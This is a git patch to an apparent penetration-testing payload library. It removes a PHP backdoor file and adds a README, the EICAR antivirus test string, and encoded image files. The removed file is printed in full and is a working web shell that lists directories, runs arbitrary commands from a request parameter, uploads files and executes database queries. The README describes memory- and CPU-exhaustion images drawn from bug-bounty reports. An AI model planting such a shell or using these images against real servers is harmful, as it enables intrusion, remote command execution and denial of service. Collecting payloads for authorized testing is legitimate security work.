From 3bdab43348cbdfd98a709e4420030b6fa150ef19 Mon Sep 17 00:00:00 2001 From: Jason Haddix Date: Sat, 5 Sep 2015 23:28:08 -0700 Subject: [PATCH] files added eicar and img aprser fuzers --- Payloads/FUZZDB_php-backdoor.php | 71 ------------------------------- Payloads/README.md | 29 +++++++++++++ Payloads/eicar.com.txt | 1 + Payloads/lottapixel.jpg | Bin 0 -> 4856 bytes Payloads/uber.gif | Bin 0 -> 920039 bytes 5 files changed, 30 insertions(+), 71 deletions(-) delete mode 100755 Payloads/FUZZDB_php-backdoor.php create mode 100644 Payloads/README.md create mode 100644 Payloads/eicar.com.txt create mode 100644 Payloads/lottapixel.jpg create mode 100644 Payloads/uber.gif diff --git a/Payloads/FUZZDB_php-backdoor.php b/Payloads/FUZZDB_php-backdoor.php deleted file mode 100755 index 7defd37d..00000000 --- a/Payloads/FUZZDB_php-backdoor.php +++ /dev/null @@ -1,71 +0,0 @@ -"; - if ($handle = opendir("$d")) { - echo "

listing of $d

"; - while ($dir = readdir($handle)){ - if (is_dir("$d/$dir")) echo ""; - else echo ""; - echo "$dir\n"; - echo ""; - } - - } else echo "opendir() failed"; - closedir($handle); - die ("
"); -} -if(isset($_REQUEST['c'])){ - echo "
";
-	system($_REQUEST['c']);		   
-	die;
-}
-if(isset($_REQUEST['upload'])){
-
-		if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
-			else $dir=$_REQUEST['dir'];
-		$fname=$HTTP_POST_FILES['file_name']['name'];
-		if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
-			die('file uploading error.');
-}
-if(isset($_REQUEST['mquery'])){
-	
-	$host=$_REQUEST['host'];
-	$usr=$_REQUEST['usr'];
-	$passwd=$_REQUEST['passwd'];
-	$db=$_REQUEST['db'];
-	$mquery=$_REQUEST['mquery'];
-	mysql_connect("$host", "$usr", "$passwd") or
-    die("Could not connect: " . mysql_error());
-    mysql_select_db("$db");
-    $result = mysql_query("$mquery");
-	if($result!=FALSE) echo "
query was executed correctly
\n";
-    while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);  
-    mysql_free_result($result);
-	die;
-}
-?>
-
execute command: 
 
-

-upload file:   to dir:   

-
to browse go to http://?d=[directory here]
-
for example:
-http://?d=/etc on *nix
-or http://?d=c:/windows on win
-
execute mysql query:
-

-host:  user:  password: 
-
-database:   query:  
-

-
-
diff --git a/Payloads/README.md b/Payloads/README.md
new file mode 100644
index 00000000..d8c70a09
--- /dev/null
+++ b/Payloads/README.md
@@ -0,0 +1,29 @@
+## lottapixel
+
+Originally reported at https://hackerone.com/reports/390, addressed on paperclip.
+
+A specially crafted JPEG (the original file was named lottapixel.jpg) causes attempts to determine the dimensions of the image to exhaust available memory. From the original report:
+
+The exploit is really simple. I have an image of 5kb, 260x260 pixels. In the image itself I exchange the 260x260 values with 0xfafa x 0xfafa (so 64250x64250 pixels). Now from what I remember your service tries to convert the image once uploaded. By loading the 'whole image' into memory, it tries to allocate 4128062500 pixels into memory, flooding the memory and causing DoS.
+
+## uber.gif
+
+Current limits
+
+Image size: 1 MB
+Image dimensions: 2048x2048px
+File types: jpg/png/gif
+
+Another image hack
+
+A GIF composed of 40k 1x1 images made Paperclip freeze until timeout.
+
+As attachments I sent the file composed of 40k images, and a screenshot of the timeout.
+
+## EICAR File
+
+The EICAR Standard Anti-Virus Test File or EICAR test file is a computer file that was developed by the European Institute for Computer Antivirus Research (EICAR) and Computer Antivirus Research Organization (CARO), to test the response of computer antivirus (AV) programs. Instead of using real malware, which could do real damage, this test file allows people to test anti-virus software without having to use a real computer virus.
+
+Anti-virus programmers set the EICAR string as a verified virus, similar to other identified signatures. A compliant virus scanner, when detecting the file, will respond in exactly the same manner as if it found a harmful virus. Not all virus scanners are compliant, and may not detect the file even when they are correctly configured.
+
+The use of the EICAR test string can be more versatile than straightforward detection: a file containing the EICAR test string can be compressed or archived, and then the antivirus software can be run to see whether it can detect the test string in the compressed file.
\ No newline at end of file
diff --git a/Payloads/eicar.com.txt b/Payloads/eicar.com.txt
new file mode 100644
index 00000000..a2463df6
--- /dev/null
+++ b/Payloads/eicar.com.txt
@@ -0,0 +1 @@
+X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
\ No newline at end of file
diff --git a/Payloads/lottapixel.jpg b/Payloads/lottapixel.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..e25c2d30156d39d0930a54975211d7339c83b73b
GIT binary patch
literal 4856
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